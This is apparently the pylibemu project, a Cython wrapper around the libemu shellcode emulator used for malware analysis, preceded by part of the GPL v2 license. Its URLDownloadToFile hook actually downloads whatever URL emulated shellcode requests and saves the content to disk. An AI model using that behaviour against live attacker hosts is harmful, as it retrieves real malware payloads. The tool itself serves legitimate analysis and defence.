81 | source code as you receive it, in any medium, provided that you 82 | conspicuously and appropriately publish on each copy an appropriate 83 | copyright notice and disclaimer of warranty; keep intact all the 84 | notices that refer to this License and to the absence of any warranty; 85 | and give any other recipients of the Program a copy of this License 86 | along with the Program. 87 | 88 | You may charge a fee for the physical act of transferring a copy, and 89 | you may at your option offer warranty protection in exchange for a fee. 90 | 91 | 2. You may modify your copy or copies of the Program or any portion 92 | of it, thus forming a work based on the Program, and copy and 93 | distribute such modifications or work under the terms of Section 1 94 | above, provided that you also meet all of these conditions: 95 | 96 | a) You must cause the modified files to carry prominent notices 97 | stating that you changed the files and the date of any change. 98 | 99 | b) You must cause any work that you distribute or publish, that in 100 | whole or in part contains or is derived from the Program or any 101 | part thereof, to be licensed as a whole at no charge to all third 102 | parties under the terms of this License. 103 | 104 | c) If the modified program normally reads commands interactively 105 | when run, you must cause it, when started running for such 106 | interactive use in the most ordinary way, to print or display an 107 | announcement including an appropriate copyright notice and a 108 | notice that there is no warranty (or else, saying that you provide 109 | a warranty) and that users may redistribute the program under 110 | these conditions, and telling the user how to view a copy of this 111 | License. (Exception: if the Program itself is interactive but 112 | does not normally print such an announcement, your work based on 113 | the Program is not required to print an announcement.) 114 | 115 | These requirements apply to the modified work as a whole. If 116 | identifiable sections of that work are not derived from the Program, 117 | and can be reasonably considered independent and separate works in 118 | themselves, then this License, and its terms, do not apply to those 119 | sections when you distribute them as separate works. But when you 120 | distribute the same sections as part of a whole which is a work based 121 | on the Program, the distribution of the whole must be on the terms of 122 | this License, whose permissions for other licensees extend to the 123 | entire whole, and thus to each and every part regardless of who wrote it. 124 | 125 | Thus, it is not the intent of this section to claim rights or contest 126 | your rights to work written entirely by you; rather, the intent is to 127 | exercise the right to control the distribution of derivative or 128 | collective works based on the Program. 129 | 130 | In addition, mere aggregation of another work not based on the Program 131 | with the Program (or with a work based on the Program) on a volume of 132 | a storage or distribution medium does not bring the other work under 133 | the scope of this License. 134 | 135 | 3. You may copy and distribute the Program (or a work based on it, 136 | under Section 2) in object code or executable form under the terms of 137 | Sections 1 and 2 above provided that you also do one of the following: 138 | 139 | a) Accompany it with the complete corresponding machine-readable 140 | source code, which must be distributed under the terms of Sections 141 | 1 and 2 above on a medium customarily used for software interchange; or, 142 | 143 | b) Accompany it with a written offer, valid for at least three 144 | years, to give any third party, for a charge no more than your 145 | cost of physically performing source distribution, a complete 146 | machine-readable copy of the corresponding source code, to be 147 | distributed under the terms of Sections 1 and 2 above on a medium 148 | customarily used for software interchange; or, 149 | 150 | c) Accompany it with the information you received as to the offer 151 | to distribute corresponding source code. (This alternative is 152 | allowed only for noncommercial distribution and only if you 153 | received the program in object code or executable form with such 154 | an offer, in accord with Subsection b above.) 155 | 156 | The source code for a work means the preferred form of the work for 157 | making modifications to it. For an executable work, complete source 158 | code means all the source code for all modules it contains, plus any 159 | associated interface definition files, plus the scripts used to 160 | control compilation and installation of the executable. However, as a 161 | special exception, the source code distributed need not include 162 | anything that is normally distributed (in either source or binary 163 | form) with the major components (compiler, kernel, and so on) of the 164 | operating system on which the executable runs, unless that component 165 | itself accompanies the executable. 166 | 167 | If distribution of executable or object code is made by offering 168 | access to copy from a designated place, then offering equivalent 169 | access to copy the source code from the same place counts as 170 | distribution of the source code, even though third parties are not 171 | compelled to copy the source along with the object code. 172 | 173 | 4. You may not copy, modify, sublicense, or distribute the Program 174 | except as expressly provided under this License. Any attempt 175 | otherwise to copy, modify, sublicense or distribute the Program is 176 | void, and will automatically terminate your rights under this License. 177 | However, parties who have received copies, or rights, from you under 178 | this License will not have their licenses terminated so long as such 179 | parties remain in full compliance. 180 | 181 | 5. You are not required to accept this License, since you have not 182 | signed it. However, nothing else grants you permission to modify or 183 | distribute the Program or its derivative works. These actions are 184 | prohibited by law if you do not accept this License. Therefore, by 185 | modifying or distributing the Program (or any work based on the 186 | Program), you indicate your acceptance of this License to do so, and 187 | all its terms and conditions for copying, distributing or modifying 188 | the Program or works based on it. 189 | 190 | 6. Each time you redistribute the Program (or any work based on the 191 | Program), the recipient automatically receives a license from the 192 | original licensor to copy, distribute or modify the Program subject to 193 | these terms and conditions. You may not impose any further 194 | restrictions on the recipients' exercise of the rights granted herein. 195 | You are not responsible for enforcing compliance by third parties to 196 | this License. 197 | 198 | 7. If, as a consequence of a court judgment or allegation of patent 199 | infringement or for any other reason (not limited to patent issues), 200 | conditions are imposed on you (whether by court order, agreement or 201 | otherwise) that contradict the conditions of this License, they do not 202 | excuse you from the conditions of this License. If you cannot 203 | distribute so as to satisfy simultaneously your obligations under this 204 | License and any other pertinent obligations, then as a consequence you 205 | may not distribute the Program at all. For example, if a patent 206 | license would not permit royalty-free redistribution of the Program by 207 | all those who receive copies directly or indirectly through you, then 208 | the only way you could satisfy both it and this License would be to 209 | refrain entirely from distribution of the Program. 210 | 211 | If any portion of this section is held invalid or unenforceable under 212 | any particular circumstance, the balance of the section is intended to 213 | apply and the section as a whole is intended to apply in other 214 | circumstances. 215 | 216 | It is not the purpose of this section to induce you to infringe any 217 | patents or other property right claims or to contest validity of any 218 | such claims; this section has the sole purpose of protecting the 219 | integrity of the free software distribution system, which is 220 | implemented by public license practices. Many people have made 221 | generous contributions to the wide range of software distributed 222 | through that system in reliance on consistent application of that 223 | system; it is up to the author/donor to decide if he or she is willing 224 | to distribute software through any other system and a licensee cannot 225 | impose that choice. 226 | 227 | This section is intended to make thoroughly clear what is believed to 228 | be a consequence of the rest of this License. 229 | 230 | 8. If the distribution and/or use of the Program is restricted in 231 | certain countries either by patents or by copyrighted interfaces, the 232 | original copyright holder who places the Program under this License 233 | may add an explicit geographical distribution limitation excluding 234 | those countries, so that distribution is permitted only in or among 235 | countries not thus excluded. In such case, this License incorporates 236 | the limitation as if written in the body of this License. 237 | 238 | 9. The Free Software Foundation may publish revised and/or new versions 239 | of the General Public License from time to time. Such new versions will 240 | be similar in spirit to the present version, but may differ in detail to 241 | address new problems or concerns. 242 | 243 | Each version is given a distinguishing version number. If the Program 244 | specifies a version number of this License which applies to it and "any 245 | later version", you have the option of following the terms and conditions 246 | either of that version or of any later version published by the Free 247 | Software Foundation. If the Program does not specify a version number of 248 | this License, you may choose any version ever published by the Free Software 249 | Foundation. 250 | 251 | 10. If you wish to incorporate parts of the Program into other free 252 | programs whose distribution conditions are different, write to the author 253 | to ask for permission. For software which is copyrighted by the Free 254 | Software Foundation, write to the Free Software Foundation; we sometimes 255 | make exceptions for this. Our decision will be guided by the two goals 256 | of preserving the free status of all derivatives of our free software and 257 | of promoting the sharing and reuse of software generally. 258 | 259 | NO WARRANTY 260 | 261 | 11. BECAUSE THE PROGRAM IS LICENSED FREE OF CHARGE, THERE IS NO WARRANTY 262 | FOR THE PROGRAM, TO THE EXTENT PERMITTED BY APPLICABLE LAW. EXCEPT WHEN 263 | OTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR OTHER PARTIES 264 | PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED 265 | OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF 266 | MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. THE ENTIRE RISK AS 267 | TO THE QUALITY AND PERFORMANCE OF THE PROGRAM IS WITH YOU. SHOULD THE 268 | PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF ALL NECESSARY SERVICING, 269 | REPAIR OR CORRECTION. 270 | 271 | 12. IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING 272 | WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MAY MODIFY AND/OR 273 | REDISTRIBUTE THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, 274 | INCLUDING ANY GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING 275 | OUT OF THE USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED 276 | TO LOSS OF DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY 277 | YOU OR THIRD PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER 278 | PROGRAMS), EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE 279 | POSSIBILITY OF SUCH DAMAGES. 280 | 281 | END OF TERMS AND CONDITIONS 282 | 283 | Appendix: How to Apply These Terms to Your New Programs 284 | 285 | If you develop a new program, and you want it to be of the greatest 286 | possible use to the public, the best way to achieve this is to make it 287 | free software which everyone can redistribute and change under these terms. 288 | 289 | To do so, attach the following notices to the program. It is safest 290 | to attach them to the start of each source file to most effectively 291 | convey the exclusion of warranty; and each file should have at least 292 | the "copyright" line and a pointer to where the full notice is found. 293 | 294 | 295 | Copyright (C) 19yy 296 | 297 | This program is free software; you can redistribute it and/or modify 298 | it under the terms of the GNU General Public License as published by 299 | the Free Software Foundation; either version 2 of the License, or 300 | (at your option) any later version. 301 | 302 | This program is distributed in the hope that it will be useful, 303 | but WITHOUT ANY WARRANTY; without even the implied warranty of 304 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 305 | GNU General Public License for more details. 306 | 307 | You should have received a copy of the GNU General Public License 308 | along with this program; if not, write to the Free Software 309 | Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111 USA 310 | 311 | Also add information on how to contact you by electronic and paper mail. 312 | 313 | If the program is interactive, make it output a short notice like this 314 | when it starts in an interactive mode: 315 | 316 | Gnomovision version 69, Copyright (C) 19yy name of author 317 | Gnomovision comes with ABSOLUTELY NO WARRANTY; for details type `show w'. 318 | This is free software, and you are welcome to redistribute it 319 | under certain conditions; type `show c' for details. 320 | 321 | The hypothetical commands `show w' and `show c' should show the appropriate 322 | parts of the General Public License. Of course, the commands you use may 323 | be called something other than `show w' and `show c'; they could even be 324 | mouse-clicks or menu items--whatever suits your program. 325 | 326 | You should also get your employer (if you work as a programmer) or your 327 | school, if any, to sign a "copyright disclaimer" for the program, if 328 | necessary. Here is a sample; alter the names: 329 | 330 | Yoyodyne, Inc., hereby disclaims all copyright interest in the program 331 | `Gnomovision' (which makes passes at compilers) written by James Hacker. 332 | 333 | , 1 April 1989 334 | Ty Coon, President of Vice 335 | 336 | This General Public License does not permit incorporating your program into 337 | proprietary programs. If your program is a subroutine library, you may 338 | consider it more useful to permit linking proprietary applications with the 339 | library. If this is what you want to do, use the GNU Library General 340 | Public License instead of this License. 341 | -------------------------------------------------------------------------------- /src/pylibemu.pyx: -------------------------------------------------------------------------------- 1 | # 2 | # pylibemu.pyx 3 | # 4 | # Copyright(c) 2011-2022 Angelo Dell'Aera 5 | # 6 | # This program is free software; you can redistribute it and/or modify 7 | # it under the terms of the GNU General Public License version 2 as 8 | # published by the Free Software Foundation. 9 | # 10 | # This program is distributed in the hope that it will be useful, 11 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 12 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 13 | # GNU General Public License for more details. 14 | # 15 | # You should have received a copy of the GNU General Public License 16 | # along with this program; if not, write to the Free Software 17 | # Foundation, Inc., 59 Temple Place, Suite 330, Boston, 18 | # MA 02111-1307 USA 19 | 20 | #cython: language_level=3 21 | 22 | cimport pylibemu 23 | 24 | __version__ = '0.8' 25 | 26 | import sys 27 | 28 | try: 29 | import urllib.request as urllib2 30 | except ImportError: 31 | import urllib2 32 | 33 | import hashlib 34 | import logging 35 | 36 | logging.basicConfig(format = '%(asctime)s %(message)s', datefmt = '[%Y-%m-%d %H:%M:%S]') 37 | 38 | 39 | # export register numbers 40 | class EMU_REGS: 41 | eax = 0 42 | ecx = 1 43 | edx = 2 44 | ebx = 3 45 | esp = 4 46 | ebp = 5 47 | esi = 6 48 | edi = 7 49 | 50 | 51 | # User hooks 52 | cdef uint32_t ExitProcess(c_emu_env *env, c_emu_env_hook *hook...) noexcept: 53 | cdef va_list args 54 | cdef int _exitcode 55 | 56 | va_start(args, hook) 57 | _exitcode = va_arg(args, int_type) 58 | va_end(args) 59 | return 0 60 | 61 | cdef uint32_t ExitThread(c_emu_env *env, c_emu_env_hook *hook...) noexcept: 62 | cdef va_list args 63 | cdef int _exitcode 64 | 65 | va_start(args, hook) 66 | _exitcode = va_arg(args, int_type) 67 | va_end(args) 68 | return 0 69 | 70 | cdef uint32_t URLDownloadToFile(c_emu_env *env, c_emu_env_hook *hook...) noexcept: 71 | cdef va_list args 72 | cdef void *_pCaller 73 | cdef char *szURL 74 | cdef char *szFileName 75 | cdef int _dwReserved 76 | cdef void *_lpfnCB 77 | 78 | va_start(args, hook) 79 | _pCaller = va_arg(args, void_ptr_type) 80 | szURL = va_arg(args, char_ptr_type) 81 | szFileName = va_arg(args, char_ptr_type) 82 | _dwReserved = va_arg(args, int_type) 83 | _lpfnCB = va_arg(args, void_ptr_type) 84 | va_end(args) 85 | 86 | logging.warning("Downloading %s (%s)" % (szURL.decode('utf-8'), 87 | szFileName.decode('utf-8'))) 88 | 89 | try: 90 | url = urllib2.urlopen(szURL.decode('utf-8'), timeout = 10) 91 | content = url.read() 92 | except Exception: 93 | logging.warning("Error while downloading from %s" % (szURL, )) 94 | return 0x800C0008 # INET_E_DOWNLOAD_FAILURE 95 | 96 | m = hashlib.md5(content) 97 | with open(str(m.hexdigest()), mode = 'wb') as fd: 98 | fd.write(content) 99 | 100 | return 0 101 | 102 | 103 | DEF OUTPUT_SIZE = 1024 * 1024 # 1MB 104 | DEF SEP_SIZE = 16 105 | DEF S_SIZE = 4096 106 | 107 | 108 | cdef class EmuProfile: 109 | cdef char *sep[SEP_SIZE] 110 | cdef char *output 111 | cdef char *t 112 | cdef char *s 113 | cdef bint truncate 114 | cdef unsigned long output_size 115 | 116 | def __cinit__(self, size_t output_size): 117 | self.truncate = False 118 | self.output_size = output_size 119 | 120 | self.output = malloc(output_size) 121 | self.s = malloc(S_SIZE) 122 | 123 | self.check_memalloc() 124 | memset(self.output, 0, output_size) 125 | memset(self.s , 0, S_SIZE) 126 | self.build_sep() 127 | 128 | cdef check_memalloc(self): 129 | if self.output is NULL or self.s is NULL: 130 | logging.warning("Memory allocation error") 131 | sys._exit(-1) 132 | 133 | cdef concatenate(self, char *dst, char *src, unsigned long n): 134 | if self.truncate: 135 | return 136 | 137 | if len(dst) + len(src) > n - 1: 138 | self.truncate = True 139 | return 140 | 141 | strncat(dst, src, n) 142 | 143 | cdef build_sep(self): 144 | cdef char *ssep = ' ' 145 | cdef int counter 146 | cdef int i 147 | cdef int max_len 148 | 149 | max_len = len(ssep) * SEP_SIZE + 1 150 | 151 | for i in range(SEP_SIZE): 152 | counter = i 153 | t = malloc(max_len) 154 | 155 | if t is NULL: 156 | logging.warning("Memory allocation error") 157 | sys._exit(-1) 158 | 159 | memset(t, 0, sizeof(char) * max_len) 160 | 161 | while counter: 162 | self.concatenate(t, ssep, max_len) 163 | counter -= 1 164 | 165 | self.sep[i] = t 166 | 167 | cdef log_function_header(self, c_emu_profile_function *function): 168 | snprintf(self.s, 169 | S_SIZE, 170 | "%s %s (\n", 171 | function.return_value.argtype, 172 | function.fnname) 173 | 174 | self.concatenate(self.output, self.s, self.output_size) 175 | 176 | cdef log_bracket_closed(self): 177 | cdef char *s = ")" 178 | 179 | self.concatenate(self.output, s, self.output_size) 180 | 181 | cdef log_array_start(self, c_emu_profile_argument *argument, int indent): 182 | snprintf(self.s, 183 | S_SIZE, 184 | "%s %s %s = [ \n", 185 | self.sep[indent], 186 | argument.argtype, 187 | argument.argname) 188 | 189 | self.concatenate(self.output, self.s, self.output_size) 190 | 191 | cdef log_array_end(self, c_emu_profile_argument *argument, int indent): 192 | snprintf(self.s, 193 | S_SIZE, 194 | "%s ];\n", 195 | self.sep[indent]) 196 | 197 | self.concatenate(self.output, self.s, self.output_size) 198 | 199 | cdef log_struct_start(self, c_emu_profile_argument *argument, int indent): 200 | snprintf(self.s, 201 | S_SIZE, 202 | "%s struct %s %s = {\n", 203 | self.sep[indent], 204 | argument.argtype, 205 | argument.argname) 206 | 207 | self.concatenate(self.output, self.s, self.output_size) 208 | 209 | cdef log_struct_end(self, c_emu_profile_argument *argument, int indent): 210 | snprintf(self.s, 211 | S_SIZE, 212 | "%s };\n", 213 | self.sep[indent]) 214 | 215 | self.concatenate(self.output, self.s, self.output_size) 216 | 217 | cdef emu_profile_argument_render_int(self, c_emu_profile_argument *argument, int indent): 218 | snprintf(self.s, 219 | S_SIZE, 220 | "%s %s %s = %i;\n", 221 | self.sep[indent], 222 | argument.argtype, 223 | argument.argname, 224 | argument.value.tint) 225 | 226 | self.concatenate(self.output, self.s, self.output_size) 227 | 228 | cdef emu_profile_argument_render_string(self, c_emu_profile_argument *argument, int indent): 229 | snprintf(self.s, 230 | S_SIZE, 231 | "%s %s %s = \"%s\";\n", 232 | self.sep[indent], 233 | argument.argtype, 234 | argument.argname, 235 | argument.value.tchar) 236 | 237 | self.concatenate(self.output, self.s, self.output_size) 238 | 239 | cdef emu_profile_argument_render_bytea(self, c_emu_profile_argument *argument, int indent): 240 | snprintf(self.s, 241 | S_SIZE, 242 | "%s %s %s = \".binary.\" (%i bytes);\n", 243 | self.sep[indent], 244 | argument.argtype, 245 | argument.argname, 246 | argument.value.bytea.size) 247 | 248 | self.concatenate(self.output, self.s, self.output_size) 249 | 250 | cdef emu_profile_argument_render_ptr(self, c_emu_profile_argument *argument, int is_struct, int indent): 251 | if is_struct: 252 | snprintf(self.s, 253 | S_SIZE, 254 | "%s struct %s %s = 0x%x => \n", 255 | self.sep[indent], 256 | argument.argtype, 257 | argument.argname, 258 | argument.value.tptr.addr) 259 | else: 260 | snprintf(self.s, 261 | S_SIZE, 262 | "%s %s %s = 0x%x => \n", 263 | self.sep[indent], 264 | argument.argtype, 265 | argument.argname, 266 | argument.value.tptr.addr) 267 | 268 | self.concatenate(self.output, self.s, self.output_size) 269 | 270 | cdef emu_profile_argument_render_ip(self, c_emu_profile_argument *argument, int indent): 271 | cdef c_in_addr *addr 272 | cdef char *host 273 | 274 | addr = &argument.value.tint 275 | host = inet_ntoa(addr[0]) 276 | 277 | snprintf(self.s, 278 | S_SIZE, 279 | "%s %s %s = %i (host = %s);\n", 280 | self.sep[indent], 281 | argument.argtype, 282 | argument.argname, 283 | argument.value.tint, 284 | host) 285 | 286 | self.concatenate(self.output, self.s, self.output_size) 287 | 288 | cdef emu_profile_argument_render_port(self, c_emu_profile_argument *argument, int indent): 289 | cdef uint16_t port 290 | 291 | port = ntohs(argument.value.tint) 292 | 293 | snprintf(self.s, 294 | S_SIZE, 295 | "%s %s %s = %i (port = %i);\n", 296 | self.sep[indent], 297 | argument.argtype, 298 | argument.argname, 299 | argument.value.tint, 300 | port) 301 | 302 | self.concatenate(self.output, self.s, self.output_size) 303 | 304 | cdef emu_profile_argument_render_none(self, c_emu_profile_argument *argument, int indent): 305 | snprintf(self.s, 306 | S_SIZE, 307 | "%s none;\n", 308 | self.sep[indent]) 309 | 310 | self.concatenate(self.output, self.s, self.output_size) 311 | 312 | cdef emu_profile_function_render_none(self): 313 | return 314 | 315 | cdef emu_profile_function_render_int(self, int value): 316 | snprintf(self.s, 317 | S_SIZE, 318 | " = 0x%x;\n", 319 | value) 320 | 321 | self.concatenate(self.output, self.s, self.output_size) 322 | 323 | cdef emu_profile_function_render_ptr(self, void* ptr): 324 | snprintf(self.s, 325 | S_SIZE, 326 | " = 0x%p;\n", 327 | ptr) 328 | 329 | self.concatenate(self.output, self.s, self.output_size) 330 | 331 | cdef emu_profile_argument_debug(self, c_emu_profile_argument *argument, int indent): 332 | cdef c_emu_profile_argument *argit 333 | cdef c_emu_profile_argument *argumentit 334 | cdef int is_struct 335 | 336 | if argument.render == render_struct: 337 | self.log_struct_start(argument, indent) 338 | 339 | argumentit = emu_profile_arguments_first(argument.value.tstruct.arguments) 340 | 341 | while not emu_profile_arguments_istail(argumentit): 342 | self.emu_profile_argument_debug(argumentit, indent + 1) 343 | argumentit = emu_profile_arguments_next(argumentit) 344 | 345 | self.log_struct_end(argument, indent) 346 | return 347 | 348 | if argument.render == render_array: 349 | self.log_array_start(argument, indent) 350 | 351 | argumentit = emu_profile_arguments_first(argument.value.tstruct.arguments) 352 | while not emu_profile_arguments_istail(argumentit): 353 | self.emu_profile_argument_debug(argumentit, indent + 1) 354 | argumentit = emu_profile_arguments_next(argumentit) 355 | 356 | self.log_array_end(argument, indent) 357 | return 358 | 359 | if argument.render == render_int: 360 | self.emu_profile_argument_render_int(argument, indent) 361 | return 362 | 363 | if argument.render == render_short: 364 | self.emu_profile_argument_render_int(argument, indent) 365 | return 366 | 367 | if argument.render == render_string: 368 | self.emu_profile_argument_render_string(argument, indent) 369 | return 370 | 371 | if argument.render == render_bytea: 372 | self.emu_profile_argument_render_bytea(argument, indent) 373 | return 374 | 375 | if argument.render == render_ptr: 376 | argit = argument 377 | 378 | while argit.render == render_ptr: 379 | argit = argit.value.tptr.ptr 380 | 381 | is_struct = 0 382 | if argit.render == render_struct: 383 | is_struct = 1 384 | 385 | self.emu_profile_argument_render_ptr(argument, is_struct, indent) 386 | self.emu_profile_argument_debug(argument.value.tptr.ptr, indent + 1) 387 | return 388 | 389 | if argument.render == render_ip: 390 | self.emu_profile_argument_render_ip(argument, indent) 391 | return 392 | 393 | if argument.render == render_port: 394 | self.emu_profile_argument_render_port(argument, indent) 395 | return 396 | 397 | if argument.render == render_none: 398 | self.emu_profile_argument_render_none(argument, indent) 399 | return 400 | 401 | cdef emu_profile_function_debug(self, c_emu_profile_function *function): 402 | self.log_function_header(function) 403 | 404 | argument = emu_profile_arguments_first(function.arguments) 405 | while not emu_profile_arguments_istail(argument): 406 | self.emu_profile_argument_debug(argument, 1) 407 | argument = emu_profile_arguments_next(argument) 408 | 409 | self.log_bracket_closed() 410 | 411 | render = function.return_value.render 412 | 413 | if render == render_none: 414 | self.emu_profile_function_render_none() 415 | 416 | if render == render_int: 417 | value = function.return_value.value.tint 418 | self.emu_profile_function_render_int(value) 419 | 420 | if render == render_ptr: 421 | ptr = function.return_value.value.tptr.addr 422 | self.emu_profile_function_render_int(ptr) 423 | 424 | self.emu_profile_function_render_none() 425 | 426 | cdef emu_profile_debug(self, c_emu_env *_env): 427 | function = emu_profile_functions_first(_env.profile.functions) 428 | 429 | while not emu_profile_functions_istail(function): 430 | self.emu_profile_function_debug(function) 431 | function = emu_profile_functions_next(function) 432 | 433 | 434 | cdef class Emulator: 435 | cdef c_emu *_emu 436 | cdef EmuProfile emu_profile 437 | cdef int32_t _offset 438 | cdef size_t output_size 439 | cdef bint enable_hooks 440 | 441 | def __cinit__(self, output_size = OUTPUT_SIZE, enable_hooks = True): 442 | self.output_size = output_size 443 | self.enable_hooks = enable_hooks 444 | self.new() 445 | 446 | def __dealloc__(self): 447 | self.free() 448 | 449 | def free(self): 450 | if self._emu is not NULL: 451 | emu_free(self._emu) 452 | self._emu = NULL 453 | 454 | def new(self): 455 | self._emu = emu_new() 456 | self.emu_profile = EmuProfile(self.output_size) 457 | 458 | def set_output_size(self, output_size): 459 | self.free() 460 | self.output_size = output_size 461 | self.new() 462 | 463 | def shellcode_getpc_test(self, shellcode): 464 | ''' 465 | GetPC code is code that determines its own location in a process address 466 | space. It is commonly used in code that needs to reference itself, for 467 | instance in self-decoding and self-modifying code. This method tries to 468 | identify GetPC within the shellcode. 469 | 470 | @type shellcode: Binary string 471 | @param shellcode: Shellcode 472 | 473 | @rtype: Integer 474 | @return: If GetPC code is successfully identified the offset from the 475 | start of the shellcode is returned, otherwise -1. 476 | ''' 477 | cdef char *buffer 478 | 479 | if self._emu is NULL: 480 | self.new() 481 | 482 | buffer = shellcode 483 | sclen = len(bytes(shellcode)) 484 | 485 | if buffer is NULL: 486 | return -1 487 | 488 | self._offset = emu_shellcode_test(self._emu, buffer, sclen) 489 | return self._offset 490 | 491 | def prepare(self, shellcode, offset): 492 | ''' 493 | Method used to prepare the execution environment. The offset parameter 494 | value should be determined by the `shellcode_getpc_test method'. If such 495 | method is not able to identify the GetPC code (thus returning -1) the 496 | suggested value for offset parameter is 0. 497 | 498 | @type shellcode: Binary string 499 | @param shellcode: Shellcode 500 | @type offset : Integer 501 | @param offset : GetPC offset 502 | ''' 503 | cdef c_emu_cpu *_cpu 504 | cdef c_emu_memory *_mem 505 | cdef char *scode 506 | cdef int j, static_offset 507 | 508 | if self._emu is NULL: 509 | self.new() 510 | 511 | _cpu = emu_cpu_get(self._emu) 512 | _mem = emu_memory_get(self._emu) 513 | 514 | for j in range(8): 515 | emu_cpu_reg32_set(_cpu, j, 0) 516 | 517 | emu_memory_write_dword(_mem, 0xef787c3c, 4711) 518 | emu_memory_write_dword(_mem, 0x0 , 4711) 519 | emu_memory_write_dword(_mem, 0x00416f9a, 4711) 520 | emu_memory_write_dword(_mem, 0x0044fcf7, 4711) 521 | emu_memory_write_dword(_mem, 0x00001265, 4711) 522 | emu_memory_write_dword(_mem, 0x00002583, 4711) 523 | emu_memory_write_dword(_mem, 0x00e000de, 4711) 524 | emu_memory_write_dword(_mem, 0x01001265, 4711) 525 | emu_memory_write_dword(_mem, 0x8a000066, 4711) 526 | emu_memory_write_dword(_mem, 0x7c80ffec, 0xc330408b) 527 | 528 | # Set the flags 529 | emu_cpu_eflags_set(_cpu, 0) 530 | 531 | # Write the code to the offset 532 | scode = shellcode 533 | static_offset = 0x417000 534 | emu_memory_write_block(_mem, static_offset, scode, len(shellcode)) 535 | 536 | # Set eip to the code 537 | emu_cpu_eip_set(emu_cpu_get(self._emu), static_offset + offset) 538 | 539 | emu_memory_write_block(_mem, 0x0012fe98, scode, len(shellcode)) 540 | emu_cpu_reg32_set(emu_cpu_get(self._emu), esp, 0x0012fe98) 541 | 542 | cdef check_stop_emulation(self, c_emu_env_hook *hook): 543 | return hook.hook.win.fnname.decode('utf-8') in ('ExitProcess', 'ExitThread', 'exit') 544 | 545 | cpdef int test(self, steps = 1000000): 546 | ''' 547 | Method used to test and emulate the shellcode. The method must be always 548 | called after the `prepare' method. 549 | 550 | @type steps: Integer 551 | @param steps: Max number of steps to run 552 | ''' 553 | cdef c_emu_cpu *_cpu 554 | cdef c_emu_memory *_mem 555 | cdef c_emu_env *_env 556 | cdef uint32_t eipsave 557 | cdef int j 558 | cdef int ret 559 | cdef c_emu_env_hook *hook 560 | 561 | if self._emu is NULL: 562 | return -1 563 | 564 | _cpu = emu_cpu_get(self._emu) 565 | _mem = emu_memory_get(self._emu) 566 | _env = emu_env_new(self._emu) 567 | if _env is NULL: 568 | print(emu_strerror(self._emu)) 569 | return -1 570 | 571 | _env.profile = emu_profile_new() 572 | 573 | # IAT for sqlslammer 574 | emu_memory_write_dword(_mem, 0x42ae1018, 0x7c801d77) 575 | emu_memory_write_dword(_mem, 0x42ae1010, 0x7c80ada0) 576 | emu_memory_write_dword(_mem, 0x7c80ada0, 0x51ec8b55) 577 | emu_memory_write_byte(_mem, 0x7c814eeb, 0xc3) 578 | 579 | emu_env_w32_load_dll(_env.env.win, "urlmon.dll") 580 | 581 | if self.enable_hooks: 582 | emu_env_w32_export_hook(_env, "ExitProcess", ExitProcess, NULL) 583 | emu_env_w32_export_hook(_env, "ExitThread", ExitThread, NULL) 584 | emu_env_w32_export_hook(_env, "URLDownloadToFileA", URLDownloadToFile, NULL) 585 | 586 | eipsave = 0 587 | ret = 0 588 | 589 | for j in range(steps): 590 | if not _cpu.repeat_current_instr: 591 | eipsave = emu_cpu_eip_get(emu_cpu_get(self._emu)) 592 | 593 | hook = emu_env_w32_eip_check(_env) 594 | if hook is not NULL: 595 | if hook.hook.win.fnname is NULL: 596 | logging.warning("Unhooked call to %s\n" % (hook.hook.win.fnname, )) 597 | break 598 | 599 | if self.check_stop_emulation(hook): 600 | break 601 | else: 602 | ret = emu_cpu_parse(emu_cpu_get(self._emu)) 603 | hook = NULL 604 | if ret != -1: 605 | hook = emu_env_linux_syscall_check(_env) 606 | if hook is NULL: 607 | ret = emu_cpu_step(emu_cpu_get(self._emu)) 608 | else: 609 | logging.warning("Error") 610 | 611 | if ret == -1: 612 | break 613 | 614 | self.emu_profile.emu_profile_debug(_env) 615 | return 0 616 | 617 | cpdef int run(self, shellcode, steps = 1000000): 618 | cdef int32_t offset 619 | 620 | offset = self.shellcode_getpc_test(shellcode) 621 | if offset < 0: 622 | offset = 0 623 | 624 | self.prepare(shellcode, offset) 625 | return self.test(steps = steps) 626 | 627 | @property 628 | def offset(self): 629 | return self._offset 630 | 631 | @property 632 | def emu_profile_output(self): 633 | return self.emu_profile.output 634 | 635 | @property 636 | def emu_profile_truncated(self): 637 | return self.emu_profile.truncate 638 | 639 | # CPU methods 640 | def cpu_reg32_get(self, c_emu_reg32 reg): 641 | ''' 642 | Method used to get the 32-bit value stored in a register 643 | 644 | @type reg: Integer 645 | @param reg: Register index 646 | eax = 0 647 | ecx = 1 648 | edx = 2 649 | ebx = 3 650 | esp = 4 651 | ebp = 5 652 | esi = 6 653 | edi = 7 654 | 655 | @rtype: uint32_t 656 | @return: 32-bit value stored in the register 657 | 658 | Raises RuntimeError if the Emulator is not initialized 659 | ''' 660 | cdef c_emu_cpu *_cpu 661 | 662 | if self._emu is NULL: 663 | raise RuntimeError('Emulator not initialized') 664 | 665 | _cpu = emu_cpu_get(self._emu) 666 | return emu_cpu_reg32_get(_cpu, reg) 667 | 668 | def cpu_reg32_set(self, c_emu_reg32 reg, uint32_t val): 669 | ''' 670 | Method used to set a register with a 32-bit value 671 | 672 | @type reg: Integer 673 | @param reg: Register index 674 | eax = 0 675 | ecx = 1 676 | edx = 2 677 | ebx = 3 678 | esp = 4 679 | ebp = 5 680 | esi = 6 681 | edi = 7 682 | 